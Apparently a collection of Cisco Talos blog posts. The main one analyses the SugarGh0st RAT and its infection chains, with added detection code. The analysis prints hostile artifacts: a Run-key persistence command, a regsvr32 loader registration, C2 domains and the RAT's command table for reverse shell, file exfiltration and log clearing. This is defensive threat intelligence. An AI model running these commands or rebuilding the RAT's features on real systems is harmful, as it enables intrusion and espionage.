What is threat hunting?

28 November 2023 at 13:00
Many organizations are curious about the idea of threat hunting, but what does this really entail?  

What should you be hunting for? And what do you need to put in place to threat hunt properly? 

Four experienced security professionals from across Cisco recently sat down to discuss the basics of threat hunting, and how to go about “searching for the unknown.” In this video, we cover: 

  • The core principles of threat hunting. 
  • What are attackers looking for? And therefore, what should defenders be putting in place? 
  • Stories and experiences of threat hunting. 
  • How to approach failure.  

Talos Incident Response can help organizations review specific areas of your network and its systems for indicators of potential compromise. Threat hunting is hypothesis-driven and backed by the most current threat intelligence available from Talos. 

If you are interested in how Talos Incident Response can help you with your threat hunting goals, or even help you plan a compromise assessment, take a look at the various services our team can help you with. 

New SugarGh0st RAT targets Uzbekistan government and South Korea

30 November 2023 at 13:00
  • Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” 
  • We found evidence suggesting the threat actor is targeting the Uzbekistan Ministry of Foreign Affairs and users in South Korea. 
  • We assess with high confidence that SugarGh0st is a new customized variant of Gh0st RAT, an infamous trojan that has been active for more than a decade. The assessment rests on the similarity of the command structure and the strings used in the code; SugarGh0st adds customized commands to facilitate the remote administration tasks directed by the C2 and a modified communication protocol.
  • We observed two infection chains leveraging Windows Shortcut files embedded with malicious JavaScript to deliver the components that drop and launch the SugarGh0st payload.
  • In one infection chain, the actor leverages the DynamicWrapperX tool to enable Windows API function calls from malicious JavaScript in order to run shellcode.
  • Talos assesses with low confidence that a Chinese-speaking threat actor is operating this campaign, based on the artifacts we found in the attack samples.

Suspected Chinese Actor targeting Uzbekistan and South Korea

Talos discovered four samples deployed in this campaign that are likely targeting users in Uzbekistan and South Korea based on the language of the decoy documents, the lure content, and distribution indicators Talos found in the wild. 

One of the samples was sent to users in the Ministry of Foreign Affairs of Uzbekistan. The sample is an archive containing a Windows Shortcut (LNK) file which, upon opening, drops the decoy document “Investment project details.docx” with Uzbek content about a presidential decree in Uzbekistan focused on enhancing state administration in technical regulation. The lure content of the decoy document was published in multiple Uzbekistan sources in 2021. The initial vector of the campaign is likely a phishing email with an attached malicious RAR archive sent to an employee of the Ministry of Foreign Affairs.  

Decoy document in Uzbek language.

Besides Uzbekistan, we also observed indications of targets in South Korea. We found three other decoy documents written in Korean, dropped by the malicious JavaScript embedded in the Windows Shortcut and seemingly distributed in South Korea. The decoy named “Account.pdf” was forged as a Microsoft account security notification confirming an account registration with a generated password. Another decoy, “MakerDAO MKR approaches highest since August.docx”, copies content from 코인데스크코리아 (CoinDesk Korea, a Korean news outlet covering blockchain). The third decoy, “Equipment_Repair_Guide.docx”, contains instructions for computer maintenance in an organization. Reinforcing our assessment of South Korean targets, we also observed C2 domain requests from IPs originating in South Korea. 


The decoy documents found in the samples collected by Talos.

During our analysis, we observed a couple of artifacts that suggested the actor might be Chinese-speaking. Two of the decoy files we found have the “last modified by” names shown as “浅唱丶低吟” (Sing lightly, croon) and “琴玖辞” (seems to be the name of a Chinese novel author), which are both Simplified Chinese. 

The author and last editor’s information on decoy documents.

Besides the decoy document metadata, the actor prefers using SugarGh0st, a Gh0st RAT variant. The Gh0st RAT malware is a mainstay in the Chinese threat actors’ arsenal and has been active since at least 2008. Chinese actors also have a history of targeting Uzbekistan. The targeting of the Uzbekistan Ministry of Foreign Affairs also aligns with the scope of Chinese intelligence activity abroad. 

SugarGh0st is a new Gh0st RAT variant

Talos discovered a RAT that we call SugarGh0st delivered as a payload in this campaign. Talos assesses with high confidence that SugarGh0st is a customized variant of the Gh0st RAT. Gh0st RAT was developed by a Chinese group called 红狼小组 (C.Rufus Security Team), and its source code was publicly released in 2008. The public release of the source code has made it easy for threat actors to get access to it and tailor it to fulfill their malicious intentions. There are several variants of Gh0st RAT in the threat landscape, and it remains a preferred tool for many Chinese-speaking actors, allowing them to conduct surveillance and espionage attacks.

Compared with the original Gh0st RAT, SugarGh0st adds several customized features: reconnaissance that looks for a specific Open Database Connectivity (ODBC) registry key, loading of library files with specific file extensions and function names, customized commands to facilitate the remote administration tasks directed by the C2, and changes intended to evade earlier detections. The C2 communication protocol is also modified: the first eight bytes of the network packet header are reserved as magic bytes, versus the first five in earlier Gh0st RAT variants. The remaining features, including full remote control of the infected machine, real-time and offline keylogging, webcam access, and downloading and running arbitrary binaries on the infected host, align with earlier Gh0st RAT variants. 

A multi-stage infection chain 

Talos discovered two different infection chains employed by the threat actor to target the victims in this campaign. One of the infection chains decrypts and executes the SugarGh0st RAT payload, the customized variant of the Gh0st RAT. Another infection chain leverages the DynamicWrapperX loader to inject and run the shellcode that decrypts and executes SugarGh0st. 

Infection Chain No. 1

The first infection chain starts with a malicious RAR file containing a Windows Shortcut file with a double extension. When a victim opens the shortcut, it runs a command to drop and execute an embedded JavaScript file. The JavaScript then drops a decoy document, an encrypted SugarGh0st payload, a DLL loader and a batch script. It executes the batch script, which runs the dropped DLL loader through a copied rundll32.exe. The DLL loader decrypts the encrypted SugarGh0st payload in memory and runs it reflectively. 

Shortcut file embedded with malicious JavaScript dropper

The Windows shortcut file discovered in this attack has the JavaScript dropper appended to it and carries command line arguments to drop and execute it. When the victim opens the LNK file, its command line runs, locates the embedded JavaScript by searching for the string “var onm=” (the beginning of the dropper), carves it out into the %TEMP% location and then executes the dropped JavaScript with the living-off-the-land binary (LoLBin) cscript. 

Sample of malicious LNK file.

JavaScript dropper 

The JavaScript dropper is a heavily obfuscated script embedded with base64-encoded data for the other components of the attack. The JavaScript decodes and drops the embedded files into the %TEMP% folder: a batch script, a customized DLL loader, an encrypted SugarGh0st payload and a decoy document. It first opens the decoy document to masquerade as a legitimate action, then copies the legitimate rundll32.exe from the Windows\SysWOW64 folder into %TEMP%. Finally, it executes the batch script from %TEMP%, which runs the customized DLL loader. The JavaScript deletes itself from the file system afterward. 

The JavaScript dropper.
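As an added example written for this page (not tooling from the Talos report), the following Python carves the embedded dropper out of a shortcut the same way the LNK's own command line does, by searching for the “var onm=” marker, then decodes the long base64 runs inside the script and classifies each dropped component by its magic bytes. The ShellLink header check and the magic-to-type mapping are assumptions made here; the sample shortcut is constructed and harmless.

```python
"""Added triage helper for the LNK-plus-JavaScript dropper chain.
Example code written for this page, not tooling from the Talos report."""
import base64
import re
from typing import List, Optional, Tuple

LNK_HEADER_SIZE = b"\x4c\x00\x00\x00"  # every ShellLink starts with HeaderSize 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID
JS_MARKER = b"var onm="  # start of the dropper, per the report

# Magics for the components the dropper is known to carry (assumed mapping).
MAGICS = {b"MZ": "pe", b"PK\x03\x04": "zip", b"%PDF": "pdf"}

# A base64 run long enough to be an embedded file rather than a short string.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def is_lnk(data: bytes) -> bool:
    """Check the fixed ShellLink header (size field and CLSID)."""
    return data[:4] == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def carve_js(data: bytes) -> Optional[bytes]:
    """Return the bytes from the JS marker to end of file, or None if absent."""
    if not is_lnk(data):
        return None
    idx = data.find(JS_MARKER)
    return data[idx:] if idx >= 0 else None


def classify(blob: bytes) -> str:
    """Guess what a decoded component is from its magic bytes / leading text."""
    for magic, kind in MAGICS.items():
        if blob.startswith(magic):
            return kind
    head = blob.lstrip()[:5].lower()
    if head.startswith(b"@echo") or head.startswith(b"echo"):
        return "bat"
    return "unknown"


def extract_components(js: bytes) -> List[Tuple[str, bytes]]:
    """Decode every long base64 run in the script and classify the result."""
    found = []
    for m in _B64_RUN.finditer(js):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        found.append((classify(blob), blob))
    return found


def build_sample() -> bytes:
    """Constructed, harmless stand-in for a malicious LNK: a valid ShellLink
    header, filler, then a script holding three base64 components."""
    components = [
        b"MZ" + b"\x90" * 198,                 # stands in for the DLL loader
        b"PK\x03\x04" + b"\x00" * 196,         # stands in for the .docx decoy
        b"@echo off\r\n" + b"rem constructed placeholder line\r\n" * 8,
    ]
    encoded = [base64.b64encode(c) for c in components]
    js = b"var onm=[" + b",".join(b'"' + e + b'"' for e in encoded) + b"];\r\n"
    header = LNK_HEADER_SIZE + LNK_CLSID + b"\x00" * (0x4C - 20)
    return header + b"\x00" * 64 + js


if __name__ == "__main__":
    js = carve_js(build_sample())
    for kind, blob in extract_components(js or b""):
        print(kind, len(blob), "bytes")
```

On a real sample, feed the bytes of the .lnk to carve_js and write each decoded component out for further analysis; the batch script and the encrypted payload will come out as “bat” and “unknown” respectively, since the payload has no recognizable magic until it is decrypted.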

Batch script loader

The batch script, named “ctfmon.bat” in this instance, contains the commands to run the dropped customized DLL loader. When executed, it loads the DLL with the copied rundll32.exe and calls the DLL's exported DllUnregisterServer function, an export normally found in COM (Component Object Model) DLLs.

The batch script loader.

DLL Loader decrypts and reflectively loads the SugarGh0st payload

The customized DLL loader, named “MSADOCG.DLL” (the name of a DLL associated with Microsoft's ActiveX Data Objects (ADO) technology), is a 32-bit DLL written in C++ and implemented as a COM component. The loader contains packed code that a custom stub unpacks at runtime. When the DLL runs, it unpacks that code, reads the dropped encrypted SugarGh0st payload file “DPLAY.LIB” from %TEMP%, decrypts it and runs it in memory. 

Stub code to unpack the code.
Function to load the encrypted payload.

Infection chain No. 2

Similar to the first infection chain, this attack also starts with a RAR archive containing a malicious Windows Shortcut disguised as the decoy document. The shortcut's embedded commands drop the JavaScript dropper into %TEMP% and execute it with cscript. The JavaScript in this attack drops a decoy document, a legitimate DynamicWrapperX DLL and the encrypted SugarGh0st. It uses the legitimate DLL to run embedded shellcode, which in turn launches the SugarGh0st payload. 

JavaScript leverages DynamicWrapperX to run shellcode that launches SugarGh0st

The JavaScript used in this infection chain is also heavily obfuscated and embedded with base64-encoded data for the other components of the attack, including shellcode. When executed, it drops the encrypted SugarGh0st, a DLL named “libeay32.dll” and the decoy document. The JavaScript opens the decoy document and copies wscript.exe to %TEMP% as dllhost.exe. It then runs the dropped JavaScript again using that dllhost.exe and creates a value named “CTFMON.exe” under the Run registry key to establish persistence: 

Registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Value name: CTFMON.exe
Value data: cmd /c start C:\Users\user\AppData\Local\Temp\dllhost.exe C:\Users\user\AppData\Local\Temp\~204158968.js

The file “libeay32.dll” is DynamicWrapperX (originally named “dynwrapx.dll”), a tool developed by Yuri Popov. It is an ActiveX component that exposes Windows API function calls to scripts (JScript, VBScript, etc.), which lets the attacker run shellcode from the JavaScript dropper. The component must first be registered with regsvr32.exe: 

C:\Windows\system32\regsvr32 /i /s C:\Users\ADMINI~1\AppData\Local\Temp\libeay32.dll

Registering the DynamicWrapperX DLL creates the Software\Classes\DynamicWrapperX registry key on the victim's machine with a CLSID subkey holding the value “89565275-A714-4a43-912E-978B935EDCCC”, so that the COM object can be instantiated by name. The JavaScript then creates the DynamicWrapperX ActiveX object and uses it to execute the embedded shellcode. 

The shellcode carries API hashes and the instructions to resolve the functions needed for process injection from kernel32.dll. It also loads user32.dll and shlwapi.dll. Then it reads the encrypted SugarGh0st “libeay32.lib” from %TEMP%, decrypts it and reflectively loads it into memory allocated in the dllhost.exe process. 

Shellcode that loads and decrypts the encrypted SugarGh0st. 
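Both chains leave a consistent endpoint footprint: a script host executing a .js from %TEMP%, a copied rundll32.exe (or wscript.exe renamed to dllhost.exe) running from %TEMP%, rundll32 invoking DllUnregisterServer on a DLL in %TEMP%, regsvr32 /i /s registering a DLL from %TEMP%, the CTFMON.exe Run value, and the DynamicWrapperX CLSID. The following is an added detection example written for this page, not from the Talos report; it runs over constructed process-creation and registry events whose field names (type, image, cmdline, key, name, data) are assumed, in the style of Sysmon/EDR telemetry.

```python
"""Added endpoint detection example for the SugarGh0st infection chains.
Example code written for this page, not from the Talos report."""
import ntpath
import re
from typing import Dict, List, Tuple

# User-writable temp locations the chains drop into (assumed patterns).
TEMP_RE = re.compile(r"\\(appdata\\local\\temp|windows\\temp)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
# System binary names the chains copy to or run from %TEMP%.
SYSTEM_NAMES = {"rundll32.exe", "dllhost.exe", "regsvr32.exe"} | SCRIPT_HOSTS
DYNWRAPX_CLSID = "89565275-a714-4a43-912e-978b935edccc"  # DynamicWrapperX CLSID (from the report)


def _in_temp(path: str) -> bool:
    return bool(TEMP_RE.search(path))


def check_process(ev: Dict[str, str]) -> List[str]:
    """Rules for a process-creation event: image path plus command line."""
    hits = []
    image, cmd = ev["image"], ev.get("cmdline", "")
    name = ntpath.basename(image).lower()
    low = cmd.lower()
    if name in SYSTEM_NAMES and _in_temp(image):
        hits.append(f"system binary name running from a temp directory: {image}")
    if name in SCRIPT_HOSTS and ".js" in low and _in_temp(cmd):
        hits.append("script host executing a .js dropped in temp")
    if name == "dllhost.exe" and ".js" in low:
        hits.append("dllhost.exe given a .js argument (renamed wscript)")
    if name == "rundll32.exe" and "dllunregisterserver" in low and _in_temp(cmd):
        hits.append("rundll32 calling DllUnregisterServer on a DLL in temp")
    if name == "regsvr32.exe" and "/i" in low.split() and _in_temp(cmd):
        hits.append("regsvr32 /i registering a DLL from temp")
    return hits


def check_registry(ev: Dict[str, str]) -> List[str]:
    """Rules for a registry-set event: key path, value name and data."""
    hits = []
    key, data = ev["key"].lower(), ev.get("data", "").lower()
    if key.endswith("\\currentversion\\run") and (".js" in data or _in_temp(data)):
        hits.append(f"Run-key persistence via script/temp binary: {ev.get('name')}")
    if "\\classes\\dynamicwrapperx" in key or DYNWRAPX_CLSID in key or DYNWRAPX_CLSID in data:
        hits.append("DynamicWrapperX COM registration")
    if key.endswith("\\software\\odbc\\h"):
        hits.append("SugarGh0st ODBC marker key touched")
    return hits


def triage(events) -> List[Tuple[int, str]]:
    """Return (event index, finding) pairs for every rule that fires."""
    out = []
    for i, ev in enumerate(events):
        fn = check_process if ev["type"] == "process" else check_registry
        out.extend((i, msg) for msg in fn(ev))
    return out


# Constructed events mirroring the artifacts described above (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe "C:\Users\user\AppData\Local\Temp\~204158968.js"'},
    {"type": "process", "image": r"C:\Users\user\AppData\Local\Temp\rundll32.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\rundll32.exe C:\Users\user\AppData\Local\Temp\MSADOCG.DLL,DllUnregisterServer"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"C:\Windows\system32\regsvr32 /i /s C:\Users\ADMINI~1\AppData\Local\Temp\libeay32.dll"},
    {"type": "process", "image": r"C:\Users\user\AppData\Local\Temp\dllhost.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\dllhost.exe C:\Users\user\AppData\Local\Temp\~204158968.js"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "CTFMON.exe",
     "data": r"cmd /c start C:\Users\user\AppData\Local\Temp\dllhost.exe C:\Users\user\AppData\Local\Temp\~204158968.js"},
    {"type": "registry", "key": r"HKCU\Software\Classes\DynamicWrapperX\CLSID", "name": "",
     "data": "{89565275-A714-4a43-912E-978B935EDCCC}"},
    # Benign controls: a normal rundll32 use and a normal Run entry.
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "OneDrive",
     "data": r'"C:\Program Files\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(idx, finding)
```

The rules are deliberately behavioural rather than hash-based: a renamed rundll32 or wscript in a temp directory, DllUnregisterServer invoked on a DLL outside a system path, and a Run value that starts a script host on a .js file stay detectable even if the actor rebuilds the dropper.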

Analysis of SugarGh0st   

The SugarGh0st sample analyzed by Cisco Talos is a 32-bit dynamic link library written in C++ and compiled on Aug. 23, 2023. On initial execution, SugarGh0st creates a mutex named after the hard-coded C2 domain as an infection marker and starts the keylogging function. The keylogger module creates a folder “WinRAR” under %ProgramFiles% and writes keystrokes to the file “WinLog.txt.” 

The Keylogging function of SugarGh0st.

SugarGh0st uses the WSAStartup function with a hard-coded C2 domain and port to establish the connection to the C2 server. Talos discovered two C2 domains, login[.]drive-google-com[.]tk and account[.]drive-google-com[.]tk, used by the threat actor in this campaign.

The C2 communication function of SugarGh0st.

After launching, SugarGh0st attempts to connect to the C2 every 10 seconds. If the connection succeeds, the first outgoing packet is always the same fixed header, printed in the analysis as “0x000011A40100”, which serves as a heartbeat (this is the eight-byte magic header described above; the printed value covers six of those bytes). After the heartbeat is sent, SugarGh0st sends a buffer containing:

  • Computer name
  • Operating system version 
  • Root and other drive information of the victim machine
  • Contents of the registry key “HKEY_LOCAL_MACHINE\Software\ODBC\H”, if it exists
  • Campaign code 1 (month and year) and campaign code 2 (“default” in our samples)
  • Windows version number
  • Root drive’s volume serial number

A sample packet that was sent by SugarGh0st to C2.
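The C2 behaviour just described (connection attempts every 10 seconds, a fixed heartbeat header, two hard-coded C2 domains) can be turned into simple network-side checks. The following is an added example written for this page, not code from the Talos report. It runs over constructed connection records (an assumed record shape with timestamp, source, destination and the first payload bytes), treats the header string printed above as an exact six-byte prefix (an assumption; the report describes an eight-byte magic header), and flags flows whose median inter-connection interval is about 10 seconds.

```python
"""Added network detection example for SugarGh0st C2 traffic.
Example code written for this page, not from the Talos report."""
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

C2_DOMAINS_DEFANGED = ["login[.]drive-google-com[.]tk", "account[.]drive-google-com[.]tk"]
# "0x000011A40100" as printed in the analysis; treated here as an exact prefix (assumption).
HEARTBEAT_PREFIX = bytes.fromhex("000011A40100")


def refang(domain: str) -> str:
    """Turn a defanged indicator (a[.]b) back into a matchable hostname."""
    return domain.replace("[.]", ".").lower()


C2_DOMAINS = {refang(d) for d in C2_DOMAINS_DEFANGED}


def is_c2_domain(host: str) -> bool:
    return refang(host) in C2_DOMAINS


def is_heartbeat(payload: bytes) -> bool:
    """First packet after connect matches the fixed header."""
    return payload.startswith(HEARTBEAT_PREFIX)


def find_beacons(records, period: float = 10.0, tolerance: float = 1.5,
                 min_count: int = 4) -> Dict[Tuple[str, str], float]:
    """Group connections by (src, dst) and report flows whose median
    inter-connection gap is within `tolerance` of `period` seconds."""
    by_flow = defaultdict(list)
    for r in records:
        by_flow[(r["src"], r["dst"])].append(r["t"])
    beacons = {}
    for flow, ts in by_flow.items():
        if len(ts) < min_count:
            continue  # too few contacts to call it periodic
        ts.sort()
        deltas = [b - a for a, b in zip(ts, ts[1:])]
        med = statistics.median(deltas)
        if abs(med - period) <= tolerance:
            beacons[flow] = med
    return beacons


def alerts(records) -> List[str]:
    """Unique findings: known C2 domain, heartbeat header, ~10 s beaconing."""
    out = set()
    for r in records:
        if is_c2_domain(r["dst"]):
            out.add(f"known SugarGh0st C2 domain: {r['dst']}")
        if is_heartbeat(r["payload"]):
            out.add(f"SugarGh0st heartbeat header sent to {r['dst']}")
    for (src, dst), med in find_beacons(records).items():
        out.add(f"{src} -> {dst} beaconing every ~{med:.1f}s")
    return sorted(out)


# Constructed connection records (not captured traffic).
SAMPLE_RECORDS = [
    # one host reconnecting to the C2 roughly every 10 s, sending the heartbeat
    {"t": t, "src": "10.0.0.5", "dst": "login.drive-google-com.tk",
     "payload": HEARTBEAT_PREFIX + b"\x00\x00"}
    for t in (0.0, 10.2, 19.9, 30.1, 40.0)
] + [
    # two contacts with the second C2 domain: too few to establish a period
    {"t": t, "src": "10.0.0.7", "dst": "account.drive-google-com.tk", "payload": b""}
    for t in (5.0, 900.0)
] + [
    # benign traffic at irregular intervals
    {"t": t, "src": "10.0.0.5", "dst": "updates.example.com", "payload": b"GET / HTTP/1.1"}
    for t in (3.0, 65.0, 400.0, 401.0)
]

if __name__ == "__main__":
    for line in alerts(SAMPLE_RECORDS):
        print(line)
```

The beacon check is the part that survives infrastructure changes: the domains will be rotated and the header could be altered in a rebuild, but the 10-second reconnect loop is a property of the implant's code.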

SugarGh0st is a fully functional backdoor that implements most remote control functionality. It can launch a reverse shell and run arbitrary commands sent from the C2 as strings through the command shell.

The Reverse shell function.

SugarGh0st can collect the victim machine’s hostname, file system, logical drive and operating system information. It can enumerate the running processes on the victim’s machine and control the environment by inspecting process information and terminating processes as directed by the C2 server. 

It can also interact with the machine’s service manager, reading the configuration of running services and starting, stopping or deleting services.

Function to operate services.

SugarGh0st can take screenshots of the victim machine’s current desktop and switch between windows. It can access the victim machine’s webcam to capture images and compresses the captured data before sending it to the C2 server. SugarGh0st can also perform various file operations, including searching, copying, moving and deleting files on the victim’s machine.

It also clears the machine’s Application, Security and System event logs to hide logged traces of its activity and evade detection. 

Function to clean event logs.

SugarGh0st performs the remote control functions, including those discussed earlier, as directed by the C2 server with four-byte hex commands and accompanying data. 

Command       Action
0x20000001    Adjust process privilege to “SeShutdownPrivilege” and force shut down the host.
0x20000002    Adjust process privilege to “SeShutdownPrivilege” and force reboot the host.
0x20000003    Adjust process privilege to “SeShutdownPrivilege” and force terminate processes.
0x20000004    Clear event logs.
0x20000005    Create registry key HKEY_LOCAL_MACHINE\Software\ODBC\H.
0x20000011    Press a key in the default window.
0x20000012    Release a key in the default window.
0x20000013    Set mouse cursor position.
0x20000014    Press the left mouse button.
0x20000015    Release the left mouse button.
0x20000016    Double-click the left mouse button.
0x20000017    Press the right mouse button.
0x20000018    Release the right mouse button.
0x20000019    Double-click the left mouse button.
0x21000002    Get the logical drive information of the victim's machine.
0x21000003    Search files on the victim's file system.
0x21000004    Delete files on the victim's file system.
0x21000005    Move files to the %TEMP% location.
0x21000006    Run arbitrary shell commands.
0x21000007    Copy files on the victim's machine.
0x21000008    Move files on the victim's machine.
0x21000009    Send files to the C2 server.
0x2100000A    Send data to the Windows socket.
0x2100000B    Receive files from the C2 server.
0x22000001    Send a screenshot to the C2 server.
0x24000001    Read the file %ProgramFiles%\WinRAR\~temp.dat (encoded with XOR 0x62).
0x24000002    Delete the file %ProgramFiles%\WinRAR\~temp.dat.
0x23000000    Provide reverse shell access to the C2 server.
0x25000000    Get process information and terminate the process.
0x25000001    Enumerate process information.
0x25000002    Terminate a process.
0x25000003    Access the victim's service manager.
0x25000004    Access the configuration of the running services.
0x25000005    Start a service.
0x25000006    Stop and delete services.
0x25000010    Perform window operations.
0x25000011    Get the window list.
0x25000012    Get a message from a window.
0x28000000    Capture a window and perform a series of window operations, based on the command, with the SendMessage API.
0x28000002    Find a .OLE file under “%PROGRAMFILES%\Common Files\DESIGNER” and launch it.

Coverage

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The Snort SID for this threat is 62647.

ClamAV detections available for this threat:

Win.Trojan.SugarGh0stRAT-10014937-0

Win.Tool.DynamicWrapperX-10014938-0

Txt.Loader.SugarGh0st_Bat-10014939-0

Win.Trojan.SugarGh0stRAT-10014940-0

Lnk.Dropper.SugarGh0stRAT-10014941-0

Js.Trojan.SugarGh0stRAT-10014942-1

Win.Loader.Ramnit-10014943-1

Win.Backdoor.SugarGh0stRAT-10014944-0

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. Specific OSqueries related to this threat are linked from the original post.

Indicators of Compromise

Indicators of Compromise associated with this threat can be found here.

$19 Stanley cups, fake Amazon Prime memberships all part of holiday shopping scams circulating

30 November 2023 at 19:00

I know I’m a little late to the party to hit the prime SEO for Black Friday, Cyber Monday and holiday shopping. But if I know the readers of this newsletter, everyone is far from done with their holiday shopping after just a few days. 

I also know I’m far from the only person to warn consumers about scams during this season, so I’m trying to split the difference and highlight a few specific scams and spam campaigns that are already circulating in the wild, some of which popped up right on Black Friday, so you don’t get caught in the remaining days leading up to the winter holidays. 

Fake Facebook ads seem to be the flavor of the month for scammers. This is completely anecdotal, but my mom almost got “got” with a fake Facebook post in a group she belongs to claiming to have some great deals on Nintendo Switch games on Amazon that were not actually real (thankfully she hadn’t clicked the link before she asked me if “Mario Odyssey” was a good deal at $15).  

Still, several other reports have shown that scammers are using Facebook ads to advertise a deal for a $19 Stanley cup — these are the water bottles all the influencers are using nowadays and, even when they are on sale, don’t go for any less than about $35. In this case, it looks like the actors are just looking to take your money or credit card information with a fake ordering process and no plans to send you anything. 

Adversaries have also set up fake Facebook pages and web pages disguising themselves as the retailer Big Lots. These fake ads and posts offer vague deals and sales on various products but instead point to typo-squatted Big Lots websites (or URLs that vaguely seem like they could be connected to Big Lots).  

Scammers are also sending mass emails to subscribers of various streaming services like Amazon Prime, Paramount+ and Peacock claiming that their subscription has lapsed, but they can resubscribe for a deeply discounted price, or even free, as part of a Black Friday special.  

Amazon also issued a warning recently that attackers have been sending emails with malicious attachments asking for users' personal information in exchange for having their “accounts” unlocked. 

This is just a sampling of the likely hundreds of different scams and spam campaigns attackers are deploying right now, so in general, when shopping online, here are a few tips: 

  • Only download apps from trusted and official app stores like the Google Play store and iOS App Store. 
  • Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features. 
  • Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com). 
  • Avoid clicking on unsolicited emails. Make sure you purposefully subscribed to any marketing emails you receive from retailers before opening them. 
  • Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals. 
  • Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure. 
  • Use unique, complex passwords, per site. Attackers commonly reuse passwords to compromise multiple accounts with the same username. Use a password manager if you have a hard time creating and remembering secure passwords. 
  • Manually type in URLs to sites you want to visit rather than clicking on links. 
  • Use multi-factor authentication, such as Cisco Duo, to log into your email account to avoid unauthorized access. 

Next week, Talos will have a holiday special of our own! On Dec. 5, we’ll be launching our second-ever Year in Review report, complete with all new data and insights about the attacks and malware we’ve seen in 2023. Stay tuned to our social media channels or blog for that release.  

The one big thing 

Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” We assess with high confidence that SugarGh0st is a new customized variant of Gh0st RAT, an infamous trojan that has been active for more than a decade. The assessment rests on the similarity of the command structure and the strings used in the code; SugarGh0st adds customized commands to facilitate the remote administration tasks directed by the C2 and a modified communication protocol. 

Why do I care? 

If infected, SugarGh0st serves as a fully functional backdoor for the adversary that can execute most remote-control functionalities. It can launch the reverse shell and run the arbitrary commands sent from C2 as strings using the command shell. SugarGh0st can collect the victim’s machine hostname, filesystem, logical drive, and operating system information. It can access the running process information of the victim’s machine and control the environment by accessing the process information and terminating the process as directed by the C2 server. It can also manage the machine’s service manager by accessing the configuration files of the running services and can start, terminate or delete the services. 

So now what? 

Since this seems to be an offshoot of Gh0st RAT, we certainly can’t rule out other variants that may be floating out there. Talos also has new ClamAV signatures, Snort rules and other Cisco Secure protection to specifically detect and stop SugarGh0st.  

Top security headlines of the week 

Cisco Talos and other teams across Cisco recently worked with multiple government partners to help protect the Ukrainian power grid and ensure it runs appropriately. The effort, spearheaded by Talos’ Joe Marshall, involved creating bespoke hardware for Ukraine’s energy supplier, Ukrenergo, to operate in place of the traditional GPS devices the Ukrainian power grid relies on to keep running on time. GPS satellites and Ukrainian substations have constantly been the target of kinetic and cyber threats during Russia’s invasion of Ukraine. Officials from multiple U.S. government agencies assisted in the project. The Pentagon set up flights to physically deliver the custom switches, the Department of Energy helped coordinate the equipment’s delivery, and, as Ukrenergo told CNN, the Department of Commerce was part of the critical meetings that first outlined the project. Taras Vasyliv, who oversees power dispatching for Ukrenergo, told CNN that the custom-built switches were the equivalent of a “flashlight” for a surgeon trying to operate in the dark. (CNN, Business Insider)

Leaked government documents show that some local, state and federal law enforcement officers have been able to view the phone records of millions of Americans, even those who have not been accused or suspected of a crime. The little-known Pentagon program was partially uncovered because of a letter from U.S. Sen. Ron Wyden of Oregon to U.S. Attorney General Merrick Garland, in which Wyden’s office requested more information on the project and encouraged the federal government to publicly disclose it. The letter states the White House pays wireless company AT&T to give all federal, state, local and Tribal law enforcement agencies “the ability to request often-warrantless searches.” Known as the “Hemisphere Project,” the program has apparently been around since 2007 and was reported on by the New York Times in 2013, but has largely gone unnoticed since. Wyden is attempting to challenge the legality of the Hemisphere Project. (Wired)

